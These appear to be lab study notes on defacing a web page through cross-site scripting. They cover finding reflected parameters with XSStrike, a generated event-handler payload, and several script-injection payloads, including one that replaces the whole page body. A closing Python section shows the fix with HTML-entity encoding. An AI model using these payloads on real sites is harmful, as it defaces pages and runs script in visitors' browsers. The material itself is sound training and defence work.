WEBPAGE DEFACEMENT

IDENTIFY XSS VULNERABLE INPUT FIELDS

#perform code review
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
 * review the HTML source and identify the input parameters
 * also review any linked .js files

#verify by entering data in the form fields
root@oco:~$ BROWSER > {targetSite:port} > F12
 input fields: fill in data
 * copy the full URL to identify GET request parameters
    - http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com
       - fullname, username, password, email 

#perform automated discovery
root@oco:~$ ./xsstrike.py -u "http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com"
 XSStrike v3.1.5
  [~] Checking for DOM vulnerabilities 
  [+] WAF Status: Offline 
  [!] Testing parameter: fullname 
  [-] No reflection found 
  [!] Testing parameter: username 
  [-] No reflection found 
  [!] Testing parameter: password 
  [-] No reflection found 
  [!] Testing parameter: email 
  [!] Reflections found: 1 
  [~] Analysing reflections 
  [~] Generating payloads 
  [!] Payloads generated: 3072 
  ------------------------------------------------------------
  [+] Payload: <hTML%0donpoiNtEreNtER+=+(prompt)``// 
  [!] Efficiency: 100 
  [!] Confidence: 10 
  [?] Would you like to continue scanning? [y/N]
  
#manually verify the identified parameter
root@oco:~$ BROWSER > http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=<hTML%0donpoiNtEreNtER+=+(prompt)``//
 * a prompt will be displayed

METHODS

CHANGING WEBPAGE BACKGROUND COLOR

root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.body.style.background = "#FFFF23"</script>
 * ALT: input field: <script>document.body.style.background = "purple"</script>
    - the alt method uses a named color instead of a HEX RGB value

SETTING AN IMAGE TO THE BACKGROUND

root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
SETTING PAGE TITLE

root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.title = 'HackTheBox Academy'</script>

CHANGING PAGE TEXT

root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.getElementById("todo").innerHTML = "New Text"</script>
 * ALT: <script>$("#todo").html('New Text');</script>
    - the alt method uses jQuery functions and only works if the page already loads jQuery

CHANGING THE ENTIRE HTML CODE OF THE MAIN BODY

root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.getElementsByTagName('body')[0].innerHTML = "New Text"</script>
 * this is what hacking groups typically use, leaving a simple message on the web page
 * by specifying [0], document.getElementsByTagName('body') selects the first body
   element, so assigning its innerHTML replaces the entire visible content of the page

FULL IMPLEMENTATION

#prepare HTML code locally to see how it'll look
root@oco:~$ nano defacement
  <center>
    <h1 style="color: white">Cyber Security Training</h1>
    <p style="color: white">by 
      <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"></p>
  </center>

#minify the HTML code
root@oco:~$ BROWSER > https://www.toptal.com/developers/html-minifier
 input: ...HTML code...
 output: ...minified HTML code...
 
root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy" /> </p></center>'</script>
 * because the input is stored by the application, the custom HTML code is now a
   permanent part of the web page and is shown to anyone who visits the page
 * when viewing the page's source (CTRL + U), the original HTML source is still
   present; the injected payload appears after it and only rewrites the body when
   the script runs in the visitor's browser
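
Added here as the defender's counterpart to the reflection found above (not part of the original notes): a Python model of how the registration fields get rendered, contrasting raw concatenation (the bug that lets the `email` value become a tag) with per-value HTML-entity encoding, checked against the same query string and XSStrike payload. The field names, function names and the assumption that `password` is never echoed are this example's own.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request: the registration URL from these notes, with the
# XSStrike payload placed in the `email` parameter (hypothetical app).
REQUEST_URL = (
    "http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger"
    "&password=password&email=<hTML%0donpoiNtEreNtER+=+(prompt)``//"
)
FIELDS = ("fullname", "username", "email")  # assumption: password is never echoed


def parse_params(url: str) -> dict:
    """GET parameters as single strings; parse_qs decodes %0d and '+' for us."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[-1] for name, values in query.items()}


def render_unsafe(params: dict) -> str:
    """Vulnerable rendering: values are concatenated into the markup as-is,
    so '<' from the request becomes a real tag and its event handler can run."""
    return "".join(f"<p>{name}: {params.get(name, '')}</p>" for name in FIELDS)


def render_safe(params: dict) -> str:
    """Hardened rendering: each value is entity-encoded for the HTML text
    context it lands in (quote=True also covers attribute-value contexts)."""
    return "".join(
        f"<p>{name}: {html.escape(params.get(name, ''), quote=True)}</p>"
        for name in FIELDS
    )


def unencoded_reflections(params: dict, rendered: str) -> list:
    """Names of fields whose value carries '<' or '>' and reaches the output
    verbatim: a quick regression check to run over a template or response body."""
    return [
        name for name in FIELDS
        if any(ch in params.get(name, "") for ch in "<>")
        and params[name] in rendered
    ]


if __name__ == "__main__":
    p = parse_params(REQUEST_URL)
    print("unsafe:", unencoded_reflections(p, render_unsafe(p)))  # ['email']
    print("safe  :", unencoded_reflections(p, render_safe(p)))    # []
```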
